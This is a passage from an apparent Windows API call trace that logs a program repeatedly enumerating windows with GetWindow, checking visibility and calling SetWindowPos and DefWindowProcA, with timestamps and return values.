GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.609] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.609] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.609] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.610] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.610] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.610] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.610] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.610] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.610] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.610] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.610] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.610] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.610] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.610] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.610] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.610] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.610] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.610] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.610] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.610] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.610] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.610] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.610] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.610] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.610] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.610] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.610] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.611] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.611] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.611] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.611] GetWindow (hWnd=0x10154, uCmd=0x2) returned 
0x1014a [0057.611] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.611] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.611] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.611] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.611] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.611] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.611] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.611] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.611] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.611] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.611] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.611] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.611] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.611] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.611] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.611] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.611] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.611] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.611] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.611] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.611] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.611] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.612] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.612] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.612] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.612] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.612] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.612] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.612] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.612] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.612] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.612] GetWindow (hWnd=0x100f2, 
uCmd=0x2) returned 0x100ea [0057.612] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.612] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.612] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.612] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.612] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.612] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.612] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.612] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.612] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.612] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.612] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.612] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.612] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.612] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.613] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.613] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.613] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.613] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.613] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.613] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.613] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.613] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.613] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.613] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.613] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.613] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.613] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.613] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.613] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.613] GetWindow (hWnd=0x10112, uCmd=0x2) 
returned 0x10110 [0057.613] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.613] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.613] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.613] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.613] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.613] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.613] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.613] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.613] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.613] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.613] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.614] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.614] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.614] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.614] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.614] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.614] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.614] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.614] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.614] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.614] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.614] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.614] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.614] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.614] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.614] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.614] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.614] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.614] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.614] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.614] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.614] GetWindow (hWnd=0x101b8, 
uCmd=0x2) returned 0x101aa [0057.614] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.614] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.614] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.614] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.614] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.614] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.614] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.614] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.614] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.614] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.614] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.615] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.615] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.615] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.615] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.615] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.615] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.615] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.615] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.615] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.615] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.615] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.615] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.615] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.615] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.615] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.615] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.615] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.615] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.615] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.615] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.615] 
GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.615] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.615] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.615] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.615] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.615] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.615] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.615] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.615] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.615] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.615] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.615] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.616] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.616] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.616] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.616] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.616] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.616] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.616] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.616] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.616] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.616] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.616] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.616] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.616] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.616] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.616] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.616] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.616] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.616] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.616] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.616] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 
0x300a8 [0057.616] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.616] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.616] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.616] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.616] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.616] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.616] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.616] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.616] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.616] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.617] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.617] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.617] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.617] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.617] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.617] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.617] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.617] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.617] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.617] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.617] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.617] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.617] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.617] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.617] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.617] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.617] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.617] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.617] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.617] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.617] DefWindowProcA 
(hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.617] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.617] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.617] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.617] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.617] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.617] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.617] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.618] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.618] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.618] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.618] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.618] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.618] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.618] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.618] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.618] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.618] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.618] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.618] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.618] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.618] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.618] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.618] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.618] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.618] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.618] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.618] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.618] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.618] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.618] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.618] GetWindow (hWnd=0x201d4, uCmd=0x2) 
returned 0x101b6 [0057.618] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.618] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.618] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.618] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.618] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.619] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.619] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.619] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.619] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.619] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.619] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.619] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.619] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.619] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.619] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.619] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.619] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.619] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.619] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.619] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.619] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.619] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.619] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.619] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.619] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.619] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.619] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.619] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.619] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.619] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.619] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.620] GetWindow 
(hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.620] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.620] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.620] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.620] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.620] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.620] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.620] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.620] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.620] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.620] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.620] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.620] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.620] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.620] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.620] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.620] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.620] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.620] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.620] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.620] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.620] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.620] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.620] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.621] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.621] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.621] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.621] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.621] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.621] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.621] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.621] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c 
[0057.621] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.621] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.621] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.621] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.621] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.621] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.621] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.621] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.621] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.621] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.621] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.621] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.621] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.621] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.621] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.621] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.621] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.622] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.622] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.622] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.622] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.622] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.622] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.622] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.622] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.622] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.622] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.622] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.622] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.622] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.622] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.622] GetWindow (hWnd=0x100ca, uCmd=0x2) 
returned 0x0 [0057.622] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.622] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.622] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.622] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.622] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.622] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.622] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.622] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.622] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.622] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.623] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.623] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.623] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.623] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.623] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.623] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.623] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.623] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.623] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.623] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.623] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.623] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.623] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.623] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.623] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.623] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.623] GetWindow (hWnd=0x601a8, uCmd=0x2) 